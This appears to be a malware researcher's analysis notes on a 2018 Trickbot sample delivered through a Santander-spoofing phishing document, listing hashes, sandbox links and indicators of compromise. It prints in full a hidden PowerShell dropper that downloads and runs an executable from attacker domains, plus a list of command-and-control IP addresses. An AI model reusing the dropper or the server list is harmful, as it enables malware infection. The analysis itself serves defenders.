2018-06-05 #trickbot malware sample

1. found by @neonprimetime security
2. 6/5/2018 email
3. subject: A new message or other communication has arrived
4. attachment: Secure Message.doc
5.  
6. rtf doc with equation editor exploit
7. doc body spoofs Santander
8.  
9. https://www.hybri
10. d-analysis.com/sample/cea456017fff6be22984c7ad6668bebd21b8c57b4ce86853821cbbd15e8bfdb8?environmentId=100https://app.any.run/tasks/80ee23c0-f24e-4f9a-a4f5-7204ad97c725
11. 1fe7c89e4269fd6f0d238ba38b0d1431
12.  
13. run batch script
14. CmD /C %tmp%\task.bat
15.  
16. which runs powershell
17. PowerShell -W Hidden ""function NIKTAHCOP([String] $holispit){(New-Object System.Net.WebClient).DownloadFile($holispit,'C:\Users\admin\AppData\Local\Temp\anipaydnihS.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\anipaydnihS.exe';}try{NIKTAHCOP('http://groupstalks.com/news.bin')}catch{NIKTAHCOP('http://iaecconsultants.com/news.bin')}""
18.  
19. url it downloads from
20. http://groupstalks.com/news.bin
21.  
22. which downloads (no longer available now)
23. 9ab498fc22237101236fb0048709795b
24.  
25. to
26. C:\Users\admin\AppData\Local\Temp\anipaydnihS.exe
27.  
28. appears related to trickbot per comments
29. https://myonlinesecurity.co.uk/fake-santander-bank-a-new-message-or-other-communication-has-arrived-delivers-trickbot/
30. iaecconsultants.com/news.bin
31.  
32. copies itself to and runs from
33. C:\Users\xxx\AppData\Roaming\logowin\newt.bin.exe
34.  
35. ---------
36. interesting in-memory strings
37. ---------
38. 0x28d180 (115): https://182.253.210.130:449/ser0605/[redactedinfo]_W617601.3C4F081FB772C6C5336BEA899B16365D/63/networkDll/start/(null)//
39. 0x28e960 (26): 208.75.117.70
40. 0x2911d4 (38): 185.228.233.225:447
41. 0x2b4b40 (80): C:\Users\XXX\AppData\Roaming\logowin\
42. 0x2c22bc (2172): <mcconf>
43. <ver>1000208</ver>
44. <gtag>tt0002</gtag>
45. <servs>
46. <srv>109.95.116.37:443</srv>
47. <srv>93.109.242.134:443</srv>
48. <srv>41.211.9.226:443</srv>
49. <srv>158.58.131.54:443</srv>
50. <srv>86.125.39.173:443</srv>
51. <srv>208.75.117.70:443</srv>
52. <srv>185.168.185.218:443</srv>
53. <srv>109.86.227.152:443</srv>
54. <srv>185.129.78.167:443</srv>
55. <srv>190.4.189.129:443</srv>
56. <srv>65.30.201.40:443</srv>
57. <srv>66.232.212.59:443</srv>
58. <srv>80.53.57.146:443</srv>
59. <srv>182.253.210.130:449</srv>
60. <srv>92.55.251.211:449</srv>
61. <srv>94.112.52.197:449</srv>
62. <srv>209.121.142.202:449</srv>
63. <srv>5.102.177.205:449</srv>
64. <srv>209.121.142.214:449</srv>
65. <srv>95.161.180.42:449</srv>
66. <srv>185.42.192.194:449</srv>
67. <srv>46.72.175.17:449</srv>
68. <srv>144.48.51.8:443</srv>
69. <srv>85.143.221.28:443</srv>
70. <srv>89.223.88.55:443</srv>
71. <srv>185.174.172.112:443</srv>
72. <srv>194.87.93.6:443</srv>
73. <srv>82.146.40.79:443</srv>
74. <srv>104.193.252.167:443</srv>
75. <srv>185.159.129.51:443</srv>
76. </servs>
77.  
78. 0x2d8660 (126): Please select an organism from the
79. drop-down box. Once selected, an
80. organism will turn BLACK for easy
81. identification.
82. 0x68b050 (20): START new simulation
83. 0x68b0b0 (23): Stop current simulation
84. 0x68b450 (16): # of Organisms:
85. 0x68b4d0 (16): Amount of food:
86. 0x6960e0 (55): Tanner Helland for InBio 365: Biological Life Simulator
87. 0x6979c8 (23): Display dead organisms?
88. 0x6980b7 (35):
89. Regenerate food every (x) cycles:
90. 0x6981d0 (27): Regenerate this much food:
91. 0x6982df (31): Food grants this much energy:
92. 0x6984e7 (27):
93. Multiply every (x) cycles:
94. 0x6985f7 (27):
95. New DNA mutates (x) bases:
96. 0x6987f0 (31): Save simulation data to file...
97. 0x698b38 (116): Press the start button to begin the simulator --------------------------------------------------------------------->
98. 0x698bb7 (27):
99. Please start the simulator